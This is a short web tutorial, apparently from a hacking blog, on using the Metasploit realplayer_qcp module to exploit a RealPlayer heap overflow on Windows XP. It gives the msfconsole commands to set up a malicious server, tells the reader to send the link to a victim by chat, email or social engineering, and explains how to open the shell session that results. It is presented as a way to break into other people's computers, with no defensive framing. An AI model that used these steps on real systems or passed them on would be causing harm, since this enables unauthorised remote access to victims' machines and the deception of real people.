Hack Remote PC with Real Networks Real player QCP Parsing Heap Overflow Exploit

This module exploits a heap overflow in Real player when handling a .QCP file. The specific flaw exists within qcpfformat.dll. A static 256 byte buffer is allocated on the heap and user-supplied data from the file is copied within a memory copy loop. This allows a remote attacker to execute arbitrary code running in the context of the web browser via a .QCP file with a specially crafted “fmt” chunk. At this moment this module exploits the flaw on Windows XP IE6, IE7.

Exploit Targets

RealPlayer 11.0 – 11.1

RealPlayer SP 1.0 – 1.1.5

RealPlayer 14.0.0 – 14.0.5

Internet Explorer 7.0.5730.13

Apple RealPlayer 14.0.2.633

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/realplayer_qcp

Msf exploit (realplayer_qcp)>set srvhost 192.168.1.4 (This must be an address on the local machine)

Msf exploit (realplayer_qcp)>set uripath realplayer (The Url to use for this exploit)

Msf exploit (realplayer_qcp)>exploit

Now an URL you should give to your victim http://192.168.1.4:8080/realplayer

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

Leave a Reply

Your email address will not be published. Required fields are marked *